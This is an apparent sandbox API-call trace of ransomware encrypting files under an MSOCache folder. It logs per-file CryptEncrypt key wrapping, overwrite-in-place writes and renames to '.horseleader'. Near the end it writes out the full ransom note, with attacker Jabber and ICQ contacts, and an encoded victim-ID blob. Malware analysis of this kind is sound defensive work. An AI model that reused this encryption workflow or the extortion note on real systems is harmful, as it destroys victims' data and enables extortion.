[0195.972] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0195.972] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0196.010] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0196.010] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0196.010] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=6241) returned 1 [0196.010] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x1861, lpOverlapped=0x0) returned 1 [0196.019] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffe79f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0196.019] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x1861, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x1861, lpOverlapped=0x0) returned 1 [0196.020] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.020] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0196.020] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0196.020] CloseHandle (hObject=0x21c) returned 1 [0196.020] GetProcessHeap () returned 0x780000 [0196.020] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0196.020] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0196.020] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0196.228] GetProcessHeap () returned 0x780000 [0196.228] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0196.228] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fb9f9e0, ftCreationTime.dwHighDateTime=0x1cbe575, ftLastAccessTime.dwLowDateTime=0x7fb9f9e0, ftLastAccessTime.dwHighDateTime=0x1cbe575, ftLastWriteTime.dwLowDateTime=0x437179c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x30780dd, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="VisioLR.cab", cAlternateFileName="")) returned 1 [0196.228] lstrcmpiW (lpString1="VisioLR.cab", lpString2="Windows") returned -1 [0196.229] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 78 [0196.229] StrStrIW (lpFirst="VisioLR.cab", lpSrch=".horseleader") returned 0x0 [0196.229] lstrcmpW (lpString1="VisioLR.cab", lpString2="#Decrypt#.txt") returned 1 [0196.229] lstrcmpW (lpString1="VisioLR.cab", lpString2="_uninstalling_.png") returned 1 [0196.229] lstrlenW (lpString=".testttjffg") returned 11 [0196.229] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab", lpSrch=".testttjffg") returned 0x0 [0196.229] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0196.229] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0196.229] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0196.230] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab") returned 78 [0196.230] StrStrW (lpFirst="VisioLR.cab", lpSrch=".txt") returned 0x0 [0196.230] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=50823389) returned 1 [0196.230] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.230] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0196.381] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0196.381] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0196.588] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x183986e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.588] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0196.599] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0196.599] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0196.600] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x30730dd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.600] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0196.683] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0196.683] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0196.684] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.684] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0196.684] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0196.684] CloseHandle (hObject=0x21c) returned 1 [0196.684] GetProcessHeap () returned 0x780000 [0196.684] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0196.684] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.horseleader") returned 90 [0196.684] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioLR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiolr.cab.horseleader")) returned 1 [0196.685] GetProcessHeap () returned 0x780000 [0196.685] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0196.685] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x272b1e70, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x272b1e70, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x435c1d00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2ab000, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="VisioMUI.msi", cAlternateFileName="")) returned 1 [0196.685] lstrcmpiW (lpString1="VisioMUI.msi", lpString2="Windows") returned -1 [0196.685] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 79 [0196.685] StrStrIW (lpFirst="VisioMUI.msi", lpSrch=".horseleader") returned 0x0 [0196.685] lstrcmpW (lpString1="VisioMUI.msi", lpString2="#Decrypt#.txt") returned 1 [0196.856] lstrcmpW (lpString1="VisioMUI.msi", lpString2="_uninstalling_.png") returned 1 [0196.856] lstrlenW (lpString=".testttjffg") returned 11 [0196.856] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi", lpSrch=".testttjffg") returned 0x0 [0196.856] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0196.856] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0196.856] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0196.857] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi") returned 79 [0196.857] StrStrW (lpFirst="VisioMUI.msi", lpSrch=".txt") returned 0x0 [0196.857] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2797568) returned 1 [0196.857] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.857] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0196.986] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0196.986] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0196.986] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x153000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.986] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0197.014] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0197.014] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0197.014] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2a6000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.014] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0197.026] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0197.026] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0197.026] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.026] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0197.027] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0197.027] CloseHandle (hObject=0x21c) returned 1 [0198.537] GetProcessHeap () returned 0x780000 [0198.537] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0198.537] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.horseleader") returned 91 [0198.538] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.msi.horseleader")) returned 1 [0198.538] GetProcessHeap () returned 0x780000 [0198.538] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0198.538] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f0a8e20, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f0a8e20, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="VisioMUI.xml", cAlternateFileName="")) returned 1 [0198.539] lstrcmpiW (lpString1="VisioMUI.xml", lpString2="Windows") returned -1 [0198.539] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 79 [0198.539] StrStrIW (lpFirst="VisioMUI.xml", lpSrch=".horseleader") returned 0x0 [0198.539] lstrcmpW (lpString1="VisioMUI.xml", lpString2="#Decrypt#.txt") returned 1 [0198.539] lstrcmpW (lpString1="VisioMUI.xml", lpString2="_uninstalling_.png") returned 1 [0198.539] lstrlenW (lpString=".testttjffg") returned 11 [0198.539] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml", lpSrch=".testttjffg") returned 0x0 [0198.539] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0198.539] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0198.539] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0198.540] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml") returned 79 [0198.540] StrStrW (lpFirst="VisioMUI.xml", lpSrch=".txt") returned 0x0 [0198.540] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=9503) returned 1 [0198.540] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x251f, lpOverlapped=0x0) returned 1 [0198.545] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffdae1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0198.545] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x251f, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x251f, lpOverlapped=0x0) returned 1 [0198.545] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.546] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0198.546] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0198.546] CloseHandle (hObject=0x21c) returned 1 [0198.546] GetProcessHeap () returned 0x780000 [0198.546] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0198.546] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.horseleader") returned 91 [0198.546] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.horseleader")) returned 1 [0198.547] GetProcessHeap () returned 0x780000 [0198.548] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0198.548] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f0a8e20, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f0a8e20, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="VisioMUI.xml", cAlternateFileName="")) returned 0 [0198.548] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0198.548] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0198.548] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0198.548] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0198.548] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0198.549] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjap